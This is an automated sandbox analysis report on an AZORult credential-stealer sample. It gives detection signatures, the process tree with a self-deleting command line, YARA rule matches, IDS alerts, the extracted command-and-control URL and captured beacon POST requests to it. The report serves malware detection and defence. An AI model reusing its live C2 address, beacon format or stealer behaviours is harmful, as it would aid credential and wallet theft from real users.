Windows Analysis Report
cJX8BV8LYG.exe

Overview

General Information

Sample name: cJX8BV8LYG.exe
renamed because original name is a hash value
Original sample name: 528D3EF48415F22BD277A9759D83A859.exe
Analysis ID: 1501450
MD5: 528d3ef48415f22bd277a9759d83a859
SHA1: 4ee7ed36eeaceca51e91952d25136f7260be6eab
SHA256: 7c5bd51d549520223a57177f6dde2feea2a8e48077a36d73b1c96701360a68a6
Tags: AZORult, exe
Infos:

Detection

Azorult
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Azorult
Yara detected Azorult Info Stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cJX8BV8LYG.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\cJX8BV8LYG.exe" MD5: 528D3EF48415F22BD277A9759D83A859)
    • svchost.exe (PID: 4940 cmdline: "C:\Users\user\Desktop\cJX8BV8LYG.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • cmd.exe (PID: 6944 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 5236 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Azorult | AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit. | The Gorgon Group | | https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult
{"C2 url": "http://ln6b9.shop/LN341/index.php"}
Source | Rule | Description | Author | Strings
00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Azorult_38fce9ea | unknown | unknown
  • 0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
  • 0xd778:$a2: %APPDATA%\.purple\accounts.xml
  • 0xdec0:$a3: %TEMP%\curbuf.dat
  • 0x1a1d4:$a4: PasswordsList.txt
  • 0x151d8:$a5: Software\Valve\Steam
00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Azorult_1 | Azorult Payload | kevoreilly
  • 0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
  • 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
1.2.svchost.exe.400000.0.unpack | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Azorult_38fce9ea | unknown | unknown
  • 0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
  • 0xcb78:$a2: %APPDATA%\.purple\accounts.xml
  • 0xd2c0:$a3: %TEMP%\curbuf.dat
  • 0x195d4:$a4: PasswordsList.txt
  • 0x145d8:$a5: Software\Valve\Steam
1.2.svchost.exe.400000.0.unpack | Azorult_1 | Azorult Payload | kevoreilly
  • 0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
  • 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
1.2.svchost.exe.400000.0.unpack | Azorult | detect Azorult in memory | JPCERT/CC Incident Response Group
  • 0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x19760:$v2: http://ip-api.com/json
  • 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34

            System Summary

            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\cJX8BV8LYG.exe", CommandLine: "C:\Users\user\Desktop\cJX8BV8LYG.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\cJX8BV8LYG.exe", ParentImage: C:\Users\user\Desktop\cJX8BV8LYG.exe, ParentProcessId: 5016, ParentProcessName: cJX8BV8LYG.exe, ProcessCommandLine: "C:\Users\user\Desktop\cJX8BV8LYG.exe", ProcessId: 4940, ProcessName: svchost.exe
            Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\cJX8BV8LYG.exe", CommandLine: "C:\Users\user\Desktop\cJX8BV8LYG.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\cJX8BV8LYG.exe", ParentImage: C:\Users\user\Desktop\cJX8BV8LYG.exe, ParentProcessId: 5016, ParentProcessName: cJX8BV8LYG.exe, ProcessCommandLine: "C:\Users\user\Desktop\cJX8BV8LYG.exe", ProcessId: 4940, ProcessName: svchost.exe
            Timestamp: 2024-08-29T23:42:06.010055+0200
            SID: 2029467
            Severity: 1
            Source Port: 49730
            Destination Port: 80
            Protocol: TCP
            Classtype: Malware Command and Control Activity Detected

            Timestamp: 2024-08-29T23:42:06.010055+0200
            SID: 2810276
            Severity: 1
            Source Port: 49730
            Destination Port: 80
            Protocol: TCP
            Classtype: Malware Command and Control Activity Detected

            Timestamp: 2024-08-29T23:42:06.268614+0200
            SID: 2029136
            Severity: 1
            Source Port: 80
            Destination Port: 49730
            Protocol: TCP
            Classtype: Malware Command and Control Activity Detected

            Timestamp: 2024-08-29T23:42:14.381818+0200
            SID: 2029467
            Severity: 1
            Source Port: 49731
            Destination Port: 80
            Protocol: TCP
            Classtype: Malware Command and Control Activity Detected

            AV Detection

            Source: http://ln6b9.shop/LN341/index.php | Avira URL Cloud: Label: malware
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Azorult {"C2 url": "http://ln6b9.shop/LN341/index.php"}
            Source: cJX8BV8LYG.exe | ReversingLabs: Detection: 68%
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: cJX8BV8LYG.exe | Joe Sandbox ML: detected
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004094C4 CryptUnprotectData,LocalFree,1_2_004094C4
            Source: cJX8BV8LYG.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_007EDBBE
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007F68EE FindFirstFileW,FindClose,0_2_007F68EE
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_007F698F
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007ED076
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007ED3A9
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007F9642
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007F979D
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_007F9B2B
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_007F5C97
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,1_2_004098A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D0A0 FindFirstFileW,1_2_0040D0A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,1_2_00414408
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,1_2_00408D44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose,1_2_00415610
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,1_2_004087DC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D06E FindFirstFileW,1_2_0040D06E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041303C FindFirstFileW,FindNextFileW,FindClose,1_2_0041303C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040989F FindFirstFileW,FindNextFileW,FindClose,1_2_0040989F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,1_2_004111C4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,1_2_00408D3C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041158C FindFirstFileW,FindNextFileW,FindClose,1_2_0041158C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00411590 FindFirstFileW,FindNextFileW,FindClose,1_2_00411590
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,1_2_00412D9C

            Networking

            Source: Network traffic | Suricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.4:49730 -> 172.67.128.117:80
            Source: Network traffic | Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.4:49730 -> 172.67.128.117:80
            Source: Network traffic | Suricata IDS: 2029136 - Severity 1 - ET MALWARE AZORult v3.3 Server Response M1 : 172.67.128.117:80 -> 192.168.2.4:49730
            Source: Network traffic | Suricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.4:49731 -> 172.67.128.117:80
            Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 172.67.128.117 80
            Source: Malware configuration extractor | URLs: http://ln6b9.shop/LN341/index.php
            Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: global traffic | HTTP traffic detected: POST /LN341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: ln6b9.shop | Content-Length: 105 | Cache-Control: no-cache | Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 65 8b 30 64 8b 30 6d eb 47 16 ed 26 66 97 26 67 ea 40 70 9d 30 70 9d 37 14 8b 30 61 e8 26 66 9e 26 66 97 | Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10e0d0mG&f&g@p0p70a&f&f
            Source: global traffic | HTTP traffic detected: POST /LN341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: ln6b9.shop | Content-Length: 32713 | Cache-Control: no-cache
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_007FCE44
            Source: global traffic | DNS traffic detected: DNS query: ln6b9.shop
            Source: unknown | HTTP traffic detected: POST /LN341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: ln6b9.shop | Content-Length: 105 | Cache-Control: no-cache | Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 65 8b 30 64 8b 30 6d eb 47 16 ed 26 66 97 26 67 ea 40 70 9d 30 70 9d 37 14 8b 30 61 e8 26 66 9e 26 66 97 | Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10e0d0mG&f&g@p0p70a&f&f
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: cJX8BV8LYG.exe, 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json
            Source: svchost.exe, 00000001.00000002.1813419702.0000000003612000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1815335312.0000000005200000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ln6b9.shop/LN341/index.php
            Source: svchost.exe, 00000001.00000002.1815335312.0000000005200000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ln6b9.shop/LN341/index.phpA
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0N
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: mozglue.dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://www.mozilla.com0
            Source: cJX8BV8LYG.exe, 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1814289197.000000000365F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1813546210.0000000003631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: svchost.exe, 00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf8
            Source: svchost.exe, 00000001.00000002.1813546210.0000000003631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: svchost.exe, 00000001.00000002.1814354136.0000000003679000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1814289197.000000000365F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: svchost.exe, 00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfjfile://192.168.2.1/all/Professional2019Retail.img
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007FEAFF
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007FED6A
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_007EAA57
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_00819576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00819576
            Source: Yara matchFile source: Process Memory Space: cJX8BV8LYG.exe PID: 5016, type: MEMORYSTR

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.svchost.exe.684a82d.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
            Source: 1.2.svchost.exe.68b5f7e.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
            Source: 1.2.svchost.exe.6828840.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
            Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
            Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
            Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
            Source: cJX8BV8LYG.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: cJX8BV8LYG.exe, 00000000.00000000.1640302007.0000000000842000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_44c36978-2
